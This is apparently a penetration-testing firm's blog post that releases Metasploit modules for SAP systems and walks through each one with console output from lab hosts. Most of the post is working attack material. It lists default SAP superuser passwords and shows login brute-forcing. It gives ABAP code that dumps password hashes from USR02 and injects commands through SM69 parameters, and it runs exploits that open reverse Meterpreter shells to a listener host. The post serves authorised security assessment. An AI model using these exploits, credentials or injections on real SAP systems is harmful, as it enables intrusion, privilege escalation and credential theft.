MWR SAP Metasploit Modules
We have recently developed several Metasploit auxiliary and exploitation modules to assist consultants in assessing SAP systems, and Dave has also delivered a presentation “SAP Slapping (a pentesters guide)” at CRESTCon and BSides London where some of these modules were demonstrated. We plan to submit these modules to the Metasploit Framework; however until this process is complete the modules will be available here. We have not yet finished all of the modules that we plan to write, so stay tuned for future updates.
Some of the modules here are based on, or are ports of the plugins available in the Onapsis Bizploit Opensource ERP Penetration Testing framework. Others are not. Bizploit has been an essential tool for security consultants assessing SAP systems since its release. However the framework has not been updated since then. Bizploit was our inspiration for writing the Metasploit modules.
The intention behind writing the Metasploit modules, as opposed to contributing back to the Bizploit framework, was to encourage contributions from the community. Bizploit is written in Python and C and has not seen any community contributions; this is unfortunate. We’re hoping that the community finds it easier to contribute to the Metasploit framework and helps to build an even more impressive free and open source SAP assessment tool set leveraging the capabilities of the Metasploit framework.
Mariano Nuñez (the author of the Bizploit framework) helped in our efforts in producing the Metasploit modules and was happy to share his knowledge and experience – a very cool guy. We’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP.
The majority of the modules rely on the SAP NW RFC SDK and require the Ruby wrapper ‘nwrfc’ by Martin Ceronio.
Unfortunately the NW RFC SDK is available only to those who have access to the SAP Service Marketplace (SMP). In order to get access to the SAP Marketplace you need an S-ID, password and customer number. Alternatively the required library files (such as libsapnwrfc) can be extracted from a SAP system (such as the freely available test drive systems). These third party requirements are one of the reasons that the submission to the Metasploit Framework is proving problematic.
The modules are extensively related at present to exploiting issues with Remote Function Calls (RFC). RFC is the standard SAP interface for communication between SAP systems. SAP systems can communicate with other SAP systems, or non-SAP system using RFC and/or by calling functions directly in a system (using an Advanced Business Application Programming (ABAP) interface or RFC API). RFC’s are basically independent ABAP modules that can be called locally or remotely.
RFC communication is done through the Gateway Service (each instance of a SAP system has a gateway). The gateway enables communication between work processes and external programs, as well as communication between work processes from different instances or SAP Systems. There are more than 33,000 RFC-enabled function modules available in a standard SAP ECC 6.0 system.
We have completed seven auxiliary modules and three exploit modules (more will follow soon). Details of these are presented below.
sap_rfc_client_enum auxiliary module
In SAP land, clients are things you connect to using a GUI. The range is 000 – 999, with the default clients being 000, 001, 066. If you try and connect to a client via RFC that does not exist, SAP will error: “Client
The sap_rfc_client_enum module attempts to brute force the available SAP clients via the RFC interface.
./msfcli auxiliary/scanner/sap/sap_rfc_client_enum RHOSTS=172.16.252.135 RPORT=3342 E[*] Brute forcing clients 000,001,066 [+] 172.16.252.135:3342 [SAP] client found - 000 [+] 172.16.252.135:3342 [SAP] client found - 001 [+] 172.16.252.135:3342 [SAP] client found - 066 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_brute_login auxiliary module
Typically the Default account lockout threshold applied to SAP accounts is 5. However, accounts in most systems unlock at 00:01, so if your going to attempt a brute force attack, do it before 00:00 and after the user has finished for the day.
If you can communicate with the SAP Management Console via its SOAP interface you can extract the exact configuration (unauthenticated) by making use of the Metasploit module ‘sap_mgmt_con_getprocessparameter’ written by Chris John Riley. For more details on how this is possible see here.
msf > use auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter msf auxiliary(sap_mgmt_con_getprocessparameter) > set RHOST 172.16.252.135 RHOST => 172.16.252.135 msf auxiliary(sap_mgmt_con_getprocessparameter) > set MATCH login/fail MATCH => login/fail msf auxiliary(sap_mgmt_con_getprocessparameter) > run[*] [SAP] Connecting to SAP Management Console SOAP Interface on 172.16.252.135:50013 [*] [SAP] Regex match selected, skipping loot storage [*] 172.16.252.135:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail) [*] [SAP] Process Parameter Results for (?i-mx:login\/fail) [SAP] Process Parameters ========================Name Description Value ---- ----------- ----- login/failed_user_auto_unlock Enable automatic unlock off locked user at midnight 0 login/fails_to_session_end Number of invalid login attempts until session end 3 login/fails_to_user_lock Number of invalid login attempts until user lock 5[*] Scanned 1 of 2 hosts (050% complete) [*] [SAP] Connecting to SAP Management Console SOAP Interface on 10.0.0.192:50013 [*] [SAP] Regex match selected, skipping loot storage [*] 10.0.0.192:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail) [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed
A list of default SAP system username and password combinations are contained within the table below.
| User | Description | Clients | Password |
| SAP* | Super user | 000, 001, 066 & new clients | 06071992 & PASS |
| DDIC | ABAP Dictionary super user | 000, 001 | 19920706 |
| TMSADM | Transport Management System user | 000 | PASSWORD |
| EARLYWATCH | EarlyWatch service user | 066 | SUPPORT |
| SAPCPIC | Communications user | 000, 001 | ADMIN |
The sap_rfc_brute_login module attempts to brute force the username and password combination via an exposed RFC interface.
./msfcli auxiliary/scanner/sap/sap_rfc_brute_login BLANK_PASSWORDS=false USER_AS_PASS=false RHOSTS=172.16.252.135 RPORT=3342 E[*] Brute forcing clients 000,001,066[SAP] Credentials =================host port client user pass status ---- ---- ------ ---- ---- ------ 172.16.252.135 3342 000 SAP* 06071992 locked 172.16.252.135 3342 000 DDIC 19920706 172.16.252.135 3342 001 SAP* 06071992 172.16.252.135 3342 001 DDIC 19920706 172.16.252.135 3342 066 SAP* 06071992 locked 172.16.252.135 3342 066 EARLYWATCH SUPPORT[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_sxpg_call_system exploit module
The RFC SXPG_CALL_SYSTEM can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.
The sap_rfc_sxpg_call_system module exploits an arbitrary command execution vulnerability in the SXPG_CALL_SYSTEM RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.
msf > use exploit/windows/sap/sap_rfc_sxpg_call_system msf exploit(sap_rfc_sxpg_call_system) > set RHOST 10.0.1.150 RHOST => 10.0.1.150 msf exploit(sap_rfc_sxpg_call_system) > set RPORT 3300 RPORT => 3300 msf exploit(sap_rfc_sxpg_call_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(sap_rfc_sxpg_call_system) > set LHOST 10.0.1.161 LHOST => 10.0.1.161 msf exploit(sap_rfc_sxpg_call_system) > exploit[*] Started reverse handler on 10.0.1.161:4444 [+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992 [+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_CALL_SYSTEM RFC. We're limited to approx. 256 chars, be patient! [*] Command Stager progress - 2.19% done (249/11366 bytes) [*] Command Stager progress - 4.38% done (498/11366 bytes) [*] Command Stager progress - 6.57% done (747/11366 bytes) ... snip ... [*] Command Stager progress - 95.94% done (10904/11366 bytes) [*] Command Stager progress - 98.06% done (11146/11366 bytes) [*] Command Stager progress - 100.00% done (11366/11366 bytes) [*] Sending stage (946176 bytes) to 10.0.1.150 [*] Meterpreter session 10 opened (10.0.1.161:4444 -> 10.0.1.150:55364) at Wed Mar 21 10:28:32 +0000 2012meterpreter > getuid Server username: GATEWAY\Administratormeterpreter > getsystem ...got system (via technique 1).meterpreter > sysinfo System Language : en_US OS : Windows 2008 R2 (Build 7600). Computer : GATEWAY Architecture : x64 Meterpreter : x64/win64
sap_rfc_sxpg_command_exec exploit module
The RFC SXPG_COMMAND_EXEC can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.
The sap_rfc_sxpg_command_exec module exploits arbitrary command execution vulnerability in the SXPG_COMMAND_EXEC RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.
msf > use exploit/windows/sap/sap_rfc_sxpg_command_exec msf exploit(sap_rfc_sxpg_command_exec) > set RHOST 10.0.1.150 RHOST => 10.0.1.150 msf exploit(sap_rfc_sxpg_command_exec) > set RPORT 3300 RPORT => 3300 msf exploit(sap_rfc_sxpg_command_exec) > set CLIENT 001 CLIENT => 001 msf exploit(sap_rfc_sxpg_command_exec) > set USER SAP* USER => SAP* msf exploit(sap_rfc_sxpg_command_exec) > set PASS 06071992 PASS => 06071992 msf exploit(sap_rfc_sxpg_command_exec) > set CMD LIST_DB2DUMP CMD => LIST_DB2DUMP msf exploit(sap_rfc_sxpg_command_exec) > set OS 3 OS => 3 msf exploit(sap_rfc_sxpg_command_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(sap_rfc_sxpg_command_exec) > set LHOST 10.0.1.161 LHOST => 10.0.1.161 msf exploit(sap_rfc_sxpg_command_exec) > set LPORT 4444 LPORT => 4444 msf exploit(sap_rfc_sxpg_command_exec) > exploit[*] Started reverse handler on 10.0.1.161:4444 [*] Using custom payload size of 250 [+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992 [+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_COMMAND_EXECUTE RFC. We're limited to approx. 256 chars, be patient! [*] Command Stager progress - 2.19% done (249/11366 bytes) [*] Command Stager progress - 4.38% done (498/11366 bytes) [*] Command Stager progress - 6.57% done (747/11366 bytes) ... snip ... [*] Command Stager progress - 95.94% done (10904/11366 bytes) [*] Command Stager progress - 98.06% done (11146/11366 bytes) [*] Command Stager progress - 100.00% done (11366/11366 bytes) [*] Sending stage (946176 bytes) to 10.0.1.150 [*] Meterpreter session 2 opened (10.0.1.161:4444 -> 10.0.1.150:58640) at Wed Mar 21 13:40:41 +0000 2012meterpreter > getuid Server username: GATEWAY\Administratormeterpreter > getsystem ...got system (via technique 1).meterpreter > getuid Server username: NT AUTHORITY\SYSTEMmeterpreter > sysinfo System Language : en_US OS : Windows 2008 R2 (Build 7600). Computer : GATEWAY Architecture : x64 Meterpreter : x64/win64
sap_rfc_system exploit module
The RFC_ABAP_INSTALL_AND_RUN RFC takes ABAP source lines and executes them. It is common for it to be disabled and/or access revoked in PROD environments; it is also deprecated. That doesn’t mean you won’t find it enabled or that control of DEV or QAS environments doesn’t offer the opportunity to gain access to the PROD environment!
The sap_rfc_system module exploits an arbitrary command execution vulnerability in the RFC_ABAP_INSTALL_AND_RUN RFC to deliver a custom Metasploit payload.
msf > use exploit/windows/sap/sap_rfc_system msf exploit(sap_rfc_system) > set RHOST 10.0.1.150 RHOST => 10.0.1.150 msf exploit(sap_rfc_system) > set RPORT 3300 RPORT => 3300 msf exploit(sap_rfc_system) > set CLIENT 001 CLIENT => 001 msf exploit(sap_rfc_system) > set USER SAP* USER => SAP* msf exploit(sap_rfc_system) > set PASS 06071992 PASS => 06071992 msf exploit(sap_rfc_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(sap_rfc_system) > set LHOST 10.0.1.161 LHOST => 10.0.1.161 msf exploit(sap_rfc_system) > set LPORT 3344 LPORT => 3344 msf exploit(sap_rfc_system) > exploit[*] Started reverse handler on 10.0.1.161:3344 [*] Using custom payload size of 250 [+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992 [+] 10.0.1.150:33000 [SAP] Injecting payload via RFC_ABAP_INSTALL_AND_RUN RFC. We're limited to approx. 256 chars, be patient! [*] Command Stager progress - 2.19% done (249/11366 bytes) [*] Command Stager progress - 4.38% done (498/11366 bytes) [*] Command Stager progress - 6.57% done (747/11366 bytes) ... snip ... [*] Command Stager progress - 95.94% done (10904/11366 bytes) [*] Command Stager progress - 98.06% done (11146/11366 bytes) [*] Command Stager progress - 100.00% done (11366/11366 bytes) [*] Sending stage (946176 bytes) to 10.0.1.150 [*] Meterpreter session 1 opened (10.0.1.161:3344 -> 10.0.1.150:64998) at Thu Mar 22 11:31:20 +0000 2012meterpreter > getuid Server username: GATEWAY\Administratormeterpreter > getsystem ...got system (via technique 1).meterpreter > sysinfo System Language : en_US OS : Windows 2008 R2 (Build 7600). Computer : GATEWAY Architecture : x64 Meterpreter : x64/win64
sap_rfc_usr02 auxiliary module
SAP has implemented a number of different password hashing mechanisms. Hashes are stored in table USR02 and USH02 (BCODE & PASSCODE). This module makes use of the RFC_ABAP_INSTALL_AND_RUN RFC to extract SAP user hashes from the USR02 table. The ABAP code in the module executes native SQL to extract the hashes of all users across all clients. These can be cracked by john-the-ripper. The ABAP source is below.
REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
DATA: MANDT(3), BNAME(12), BCODE TYPE XUCODE, PASSC TYPE PWD_SHA1.
EXEC SQL PERFORMING loop_output.
SELECT MANDT, BNAME, BCODE, PASSCODE INTO :MANDT, :BNAME, :BCODE, :PASSC
FROM USR02
ENDEXEC.
FORM loop_output.
WRITE: / MANDT, BNAME, BCODE, PASSC.
ENDFORM.An example run is shown below.
./msfcli auxiliary/scanner/sap/sap_rfc_usr02 RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992[SAP] Users and hashes ======================MANDT Username BCODE PASSCODE ----- -------- ----- -------- 000 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45 000 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480 000 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000 000 TMSADM 942B9DC0F2394D85 C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF 001 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45 001 ADS_AGENT 8C32369322B732F6 FE0DD787EE7EBCBF4728BDC1A865A6F15B064611 001 ADSUSER 7FE24F5321515E7F CD83AD9E92B4E37E2255FEA11AC82234BA825FBD 001 SAPJSF 7D6762BFB7504CA4 93738A70AA83C6DAA6CD0B3B1853986333A29192 001 J2EE_ADMIN 6C1541BC997289D1 149E781A80383CC59AB04E88B51832819403364F 001 J2EE_GUEST 0000000000000000 0000000000000000000000000000000000000000 001 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480 001 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000 001 DEVELOPER C4C768AEB4A99EF5 4BD353A8F1D8B453D58910CC87D24B0C1C9A9011 066 EARLYWATCH BD5E494D3ECBF5E2 0000000000000000000000000000000000000000 066 SAP* 29B60B2614510C1D 789C6E939E7BD99A554D79ABC214910A502EE407[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_read_table auxiliary module
This module makes use of the RFC_READ_TABLE function to extract arbitrary data from SAP tables.
WARNING: RFC_READ_TABLE truncates RAW data so is not capable of reading BCODE/PASSCODE fields from the USR02/USH02 tables as only the first half of the hash will be returned. RFC_READ_TABLE miscalculates the length of raw fields e.g. 8 bytes are interpreted as 8 chars when in fact it should be 16 hex chars. There is nothing you can do about it.
The text below is taken from SAP Note 382318.
The scope of function module RFC_READ_TABLE is very restricted. E.g., due to the fixed maximum row size only smaller tables can be accessed. There are several data types that cannot be handled, and also there are doubts regarding the Unicode compatibility of the function module. However, all this is quite immaterial, because the function is not meant to be publicly used anyway. It was only created to be used as a sample in various training courses, and is clearly flagged as “not released for customer”.
Solution – Do not use function module RFC_READ_TABLE in the first place!
./msfcli auxiliary/scanner/sap/sap_rfc_read_table RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 TABLE=USR02 FIELDS="MANDT,BNAME" E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] 001|ADSUSER [+] 001|ADS_AGENT [+] 001|DDIC [+] 001|DEVELOPER [+] 001|J2EE_ADMIN [+] 001|J2EE_GUEST [+] 001|SAP* [+] 001|SAPCPIC [+] 001|SAPJSF [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_system auxiliary module
This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary OS commands via the ABAP SYSTEM call. The ABAP source is below.
REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
TYPES lt_line(255) TYPE c.
DATA lv_cmd(42) TYPE c.
DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE.
lv_cmd = '#{command}'.
CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd
ID 'TAB' FIELD lt_result-*sys*.
LOOP AT lt_result.
WRITE : / lt_result.
ENDLOOP.An example run is shown below.
./msfcli auxiliary/scanner/sap/sap_rfc_system RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] 172.16.252.135:3342 [SAP] Executed id[SAP] Command Exec ==================Output ------ uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_sxpg_command_exec auxiliary module
This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. Transaction SM69 is used to maintain external OS commands.
1.1. File System
A number of OS commands are preconfigured on SAP installs within transaction SM69. Below the module is executing the LIST_DB2DUMP (ls -la) command on a UNIX system to view the attributes of the /etc/passwd file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] Command Executed: LIST_DB2DUMP /etc/passwd[SAP] Command Exec ==================Output ------ -rw-r--r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
A number of OS commands are preconfigured on SAP installs within SM69. Below the module is executing the CAT command on a UNIX system to view the contents of the /etc/passwd file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=CAT OS=2 PARAM="/etc/passwd" E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] Command Executed: CAT /etc/passwd[SAP] Command Exec ==================Output ------ at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash dnsmasq:x:103:65534:dnsmasq:/var/lib/empty:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:109:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false haldaemon:x:105:107:User for haldaemon:/var/run/hald:/bin/false lighttpd:x:101:102:user for lighttpd:/var/lib/lighttpd:/bin/false lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false news:x:9:13:News system:/etc/news:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash npladm:x:1001:100:npladm:/home/npladm:/bin/csh ntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/false polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false pulse:x:106:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false root:x:0:0:root:/root:/bin/bash sapadm:x:1004:100:sapadm:/home/sapadm:/bin/csh sdb:x:1002:100:sdb:/home/sdb:/bin/csh sqdnpl:x:1003:100:sqdnpl:/home/sqdnpl:/bin/csh sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false suse-ncc:x:108:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash testdrive:x:1000:100::/home/testdrive:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false yastws:x:107:110:User for YaST-Webservice:/var/lib/yastws:/bin/false[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
1.2. Database Pwnage
MAX DB has a similar mechanism to Oracle REMOTE_OS_AUTHENT called XUSER. If the OS user has a file named .XUSER.62 in their home directory, they can connect to the database by specifying the defined user key alone (no need to enter a username and/or password!).
Below the module is being used to execute the XUSER command to view the contents of the .XUSER.62 file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=XUSER OS=1 PARAM="list" E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] Command Executed: XUSER list[SAP] Command Exec ==================Output ------ -------------- -------------- -------------- -------------- ----------------------------------------------------------------- ----------------------------------------------------------------- ----------------------------------------------------------------- ----------------------------------------------------------------- Cachelimit :-1 Cachelimit :-1 Cachelimit :-1 Cachelimit :-1 Charset :<unspecified> Charset :<unspecified> Charset :<unspecified> Charset :<unspecified> Dbname :NPL Dbname :NPL Dbname :NPL Dbname :NPL Isolation :-1 Isolation :-1 Isolation :-1 Isolation :0 Key :DEFAULT Key :c Key :c_J2EE Key :w Long Password :????????? Long Password :????????? Long Password :????????? Long Password :????????? Nodename :nplhost Nodename :nplhost Nodename :nplhost Nodename :nplhost Password :????????? Password :????????? Password :????????? Password :????????? PasswordUCS2 :????????? PasswordUCS2 :????????? PasswordUCS2 :????????? PasswordUCS2 :????????? Sqlmode :INTERNAL Sqlmode :INTERNAL Sqlmode :INTERNAL Sqlmode :SAPR3 Timeout :-1 Timeout :-1 Timeout :-1 Timeout :0 Username :CONTROL Username :CONTROL Username :SAPNPL Username :SUPERDBA UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . . UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . . UsernameUCS2 :S.A.P.N.P.L. . . . . . . . . . . . . . . . . . . . . . . . . . . UsernameUCS2 :S.U.P.E.R.D.B.A. . . . . . . . . . . . . . . . . . . . . . . . . XUSER Entry 1 XUSER Entry 2 XUSER Entry 3 XUSER Entry 4[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Below the module is being used to execute the DBMCLI command to connect to the database with parameters extracted from the .XUSER.62 file. No credentials are provided as the OS user has access to the .XUSER.62 file and is a ‘trusted’ user.
The SQL command executed extracts the hashes for all users across all clients. These can be cracked by john-the-ripper.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=DBMCLI OS=1 PARAM="-d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02" E[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992 [+] Command Executed: DBMCLI -d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02[SAP] Command Exec ==================Output ------ 000;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45' 000;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480' 000;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000' 000;TMSADM;x'942B9DC0F2394D85';x'C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF' 001;ADSUSER;x'7FE24F5321515E7F';x'CD83AD9E92B4E37E2255FEA11AC82234BA825FBD' 001;ADS_AGENT;x'8C32369322B732F6';x'FE0DD787EE7EBCBF4728BDC1A865A6F15B064611' 001;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45' 001;DEVELOPER;x'C4C768AEB4A99EF5';x'4BD353A8F1D8B453D58910CC87D24B0C1C9A9011' 001;J2EE_ADMIN;x'6C1541BC997289D1';x'149E781A80383CC59AB04E88B51832819403364F' 001;J2EE_GUEST;x'0000000000000000';x'0000000000000000000000000000000000000000' 001;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480' 001;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000' 001;SAPJSF;x'7D6762BFB7504CA4';x'93738A70AA83C6DAA6CD0B3B1853986333A29192' 066;EARLYWATCH;x'BD5E494D3ECBF5E2';x'0000000000000000000000000000000000000000' 066;SAP*;x'29B60B2614510C1D';x'789C6E939E7BD99A554D79ABC214910A502EE407' END OK[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
1.3. Arbitrary Command Execution
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command injection PARAM=“C:\\\windows\\\win.ini & whoami” and the result below.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001 CMD="DISPLAY_DIAGLOG" OS=3 PARAM="C:\\\windows\\\win.ini & whoami" E[+] 192.168.1.20:3300 [SAP] Successful login - 001:SAP*:06071992[SAP] Command Exec ==================Output ------ ; for 16-bit app support MAPI=1 [Mail] [extensions] [files] [fonts] [mci extensions] gateway\administrator[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sap_rfc_sxpg_call_system auxiliary module
This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69. A number of OS commands are preconfigured on SAP installs within SM69. Below the module is executing the LIST_DB2DUMP command on a Windows system to view the directory listing of the c:\ drive.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_call_system RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001 CMD=LIST_DB2DUMP OS=3 PARAM=”c:\\” E[+] 192.168.1.20:3300 [SAP] Successful login – 001:SAP*:06071992 [+] Command Executed: LIST_DB2DUMP c:\[SAP] Command ExecOutput ------ 05/21/2011 12:13 AM 1,830 unattend.xml 05/22/2011 09:04 PM <DIR> sqlinstall 05/22/2011 10:02 PM 176 completesql.cmd 05/23/2011 01:23 AM 8,150 sqlcompleteconfig.ini 07/14/2009 03:20 AM <DIR> PerfLogs 10/27/2011 11:34 PM <DIR> Users 10/27/2011 11:35 PM <DIR> Program Files 10/28/2011 08:28 AM <DIR> Windows 10/28/2011 08:29 AM <DIR> Program Files (x86) 3 File(s) 10,156 bytes 6 Dir(s) 16,145,256,448 bytes free Directory of c:\ Volume Serial Number is 6450-5096 Volume in drive C has no label.[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
On Windows systems configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command injection PARAM=“C:\\\windows\\\win.ini & whoami” and the result below.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_call_system RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001 CMD=LIST_DB2DUMP OS=3 PARAM="c:\\ & whoami" E[+] 192.168.1.20:3300 [SAP] Successful login - 001:SAP*:06071992 [+] Command Executed: LIST_DB2DUMP c: & whoami[SAP] Command Exec ==================Output ------ 03/17/2012 08:23 PM <DIR> Program Files 03/17/2012 08:39 PM <DIR> Windows 05/21/2011 12:13 AM 1,830 unattend.xml 05/22/2011 09:04 PM <DIR> sqlinstall 05/22/2011 10:02 PM 176 completesql.cmd 05/23/2011 01:23 AM 8,150 sqlcompleteconfig.ini 07/14/2009 03:20 AM <DIR> PerfLogs 10/27/2011 11:34 PM <DIR> Users 10/28/2011 08:29 AM <DIR> Program Files (x86) 3 File(s) 10,156 bytes 6 Dir(s) 17,953,746,944 bytes free Directory of C:\ Volume Serial Number is 6450-5096 Volume in drive C has no label. gateway\administrator[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed